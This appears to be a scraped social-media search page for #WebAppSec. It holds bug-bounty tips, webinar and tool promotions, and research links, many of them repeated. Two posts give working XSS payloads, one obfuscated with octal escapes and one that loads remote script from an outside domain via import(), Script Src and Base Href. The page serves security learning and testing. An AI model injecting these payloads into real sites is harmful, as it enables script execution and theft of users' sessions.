#webappsec search results
BypaXSS - The Brute Art of Bypass Slides from the @BugBountyArg @ekoparty 2025 talk #XSS #Bypass #WebAppSec docs.google.com/presentation/d…
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
Here's my research about Python dirty Arbitrary File Write to RCE via overwriting shared object files or overwriting bytecode files. Enjoy! siunam321.github.io/research/pytho… #Research #WebAppSec
Don't Underestimate HTTP Desync Attacks! HTTP Request Smuggling can lead to cache poisoning, XSS, and more. Make sure you know how to handle such vulnerabilities to keep your applications safe! #CyberSecurity #WebAppSec
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar
Get serious about #XSS! Sign up or upgrade. knoxss.pro - built for pros. #WebAppSec #BugBounty #Pentesting
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
Here's my attempted research in PHP class pollution! Although I couldn't escape the object context and pollute other classes, it's still interesting that we can pollute the object's attributes and associative array's keys. siunam321.github.io/research/attem… #Research #WebAppSec
I learned how web apps work behind the scenes (from HTML/CSS/JS to servers & databases) and how vulnerabilities like SQL Injection, XSS, & CSRF can expose critical systems. academy.hackthebox.com/achievement/21… #CyberSecurity #OWASP #WebAppSec #CloudSecurity #hackthebox #htbacademy
BypaXSS - The Brute Art of Bypass Slides from the @BugBountyArg @ekoparty 2025 talk #XSS #Bypass #WebAppSec docs.google.com/presentation/d…
هانتر واقعی: صبحانهاش قهوه، ناهارش PoC و عصرش ایمیل بونتیِ تاییدشده 💻☕️📬 #BugBounty #WebAppSec
SessionReaper in Magento hijacks live shopper sessions, stealing carts and credentials. Patch now and enforce secure session IDs. malwarebytes.com/blog/news/2025… #infosec #Magento #WebAppSec
if HttpOnly or secure flags are missing, session theft becomes easier.#WebAppSec🍪
Talking about #SSRF, I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTesting
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
🔟 Server-Side Request Forgery (SSRF) ➡️ Attackers trick servers into making malicious requests. 🔑 Validate URLs, restrict network access, use allowlists. #SSRF #WebAppSec
Upload forms seem basic but are potential goldmines for attackers. The Upload Vulnerabilities room on @RealTryHackMe showed how easily malicious files bypass basic filters. A simple profile picture turning into remote code execution was mind-blowing. #UploadVulns #WebAppSec #RCE
🏆 KNOXSS September 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 5th Good luck! 🤞 Check what only KNOXSS can find for you: knoxss.pro/?page_id=766 knoxss.pro - try it now! #WebAppSec #BugBounty #PenTesting
Improve your #XSS PoCs w/ a remote call to our X55.is domain! ➡️ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…
x55.is
XSS Gym - Train your XSS Muscles
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
Courtesy of @psiinon a performance fix for @zaproxy Auth Helper was released earlier today. #AppSec #WebAppSec #DevSecOps #DAST
Get serious about #XSS! Sign up or upgrade. knoxss.pro - built for pros. #WebAppSec #BugBounty #Pentesting
Don't miss any of our #XSS tips and tricks, bypasses, memes, promos and coupons. 🤓 Hit the 🔔 in our profile page like below! #WebAppSec #BugBounty #PenTesting
There are several ways to test for #XSS that can be done manually but it is time expensive and very prone to be forgotten in a proper security assessment. Try knoxss.me #WebAppSec #PenTesting #BugBounty
Something went wrong.
Something went wrong.
United States Trends
- 1. #WWERaw 65.3K posts
- 2. Packers 46.5K posts
- 3. Packers 46.5K posts
- 4. John Cena 64.6K posts
- 5. Jalen 15.6K posts
- 6. #GoPackGo 4,877 posts
- 7. #RawOnNetflix 1,615 posts
- 8. Jordan Love 3,921 posts
- 9. Grand Slam Champion 18.8K posts
- 10. Matt LaFleur 1,057 posts
- 11. Green Bay 11.1K posts
- 12. Rusev 2,779 posts
- 13. Tush Push 10.7K posts
- 14. Kevin Patullo N/A
- 15. Cade Horton 1,217 posts
- 16. #MondayNightFootball N/A
- 17. Shipley N/A
- 18. Lane Johnson N/A
- 19. Dirty Dom 1,649 posts
- 20. Drake Baldwin 5,644 posts